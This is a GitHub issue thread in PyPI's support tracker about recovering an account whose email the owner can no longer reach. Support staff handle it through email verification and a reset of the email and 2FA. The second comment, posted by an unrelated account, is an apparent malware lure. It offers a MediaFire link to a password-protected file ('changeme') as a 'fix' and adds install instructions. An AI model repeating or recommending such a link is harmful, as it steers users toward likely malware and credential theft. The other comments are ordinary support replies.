### ISSUE TITLE
Account recovery request (unable to activate account)

### ISSUE THREAD

**Issue by dpcodebiz** [pypi/support#4677]
### PyPI Username

dpcodebiz

### Reason for request

Hi,

When I made my account, I used my university email since my account was used only for the purpose of publishing a package developed for my master's thesis. I forgot to add a secondary email address and I've been asked to update the authors of my package a few days ago. However, I do not have access anymore to my university email and it prevents me from editing my own packages until I activate my account. 

I still have access to my account (username/password), I just can't activate it.

Thanks in advance for your help

### Recovery Codes

- [X] I never generated or have lost access to the recovery codes for my account

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

### Acknowledgement

- [X] I understand that it may take a significant amount of time to process my account recovery request.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Thespi-Brain** [comment]
Hi @dpcodebiz,

Please contact support@pypi.org with an email address that you would like your account to be associated with and please reference this link (https://github.com/pypi/support/issues/4677). We will proceed from there. Thanks!

**Comment by Thespi-Brain** [comment]
Hi @dpcodebiz,

Thanks for sending over your preferred email. I have initiated an account recovery process and instructions are being sent to your preferred email address. Please follow the instructions in that email and reply to it, and we will go from there. Thanks!

**Comment by Thespi-Brain** [comment]
Hi @dpcodebiz,

Thanks for completing the verification process. The verification was successful! I have updated the primary email address on the account. Your 2FA has been reset and a password reset has been issued. You should be able to regain access to your account after completing the password reset. Let us know if you have any more issues. Thanks.
